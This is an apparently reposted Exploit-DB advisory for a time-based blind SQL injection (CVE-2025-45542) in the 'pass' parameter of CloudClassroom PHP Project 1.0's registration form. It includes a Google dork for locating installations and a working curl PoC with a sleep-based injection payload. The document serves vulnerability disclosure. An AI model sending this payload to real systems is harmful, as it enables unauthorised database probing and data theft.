[webapps] CloudClassroom PHP Project 1.0 - SQL Injection
CloudClassroom PHP Project 1.0 存在 SQL 注入漏洞,注册表单的 `pass` 参数可被利用进行时间盲注攻击,导致数据泄露。 2025-6-5 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:10 收藏
CloudClassroom PHP Project 1.0 存在 SQL 注入漏洞,注册表单的 `pass` 参数可被利用进行时间盲注攻击,导致数据泄露。 2025-6-5 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:10 收藏
# Exploit Title: CloudClassroom PHP Project 1.0 - SQL Injection
# Google Dork: inurl:CloudClassroom-PHP-Project-master
# Date: 2025-05-30
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://github.com/mathurvishal/CloudClassroom-PHP-Project
# Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project/archive/refs/heads/master.zip
# Version: 1.0
# Tested on: XAMPP on Windows 10 / Ubuntu 22.04
# CVE : CVE-2025-45542
# Description:
# A time-based blind SQL injection vulnerability exists in the pass parameter
# of the registrationform endpoint. An attacker can exploit this issue by sending
# a malicious POST request to delay server response and infer data.
# PoC Request (simulated using curl):
curl -X POST http://localhost/CloudClassroom-PHP-Project-master/registrationform \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&[email protected]&faname=test&fname=test&gender=Female&lname=test&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z&phno=94102&sub="
# The server response will be delayed if the SQL condition is true, confirming the injection point.
文章来源: https://www.exploit-db.com/exploits/52314
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh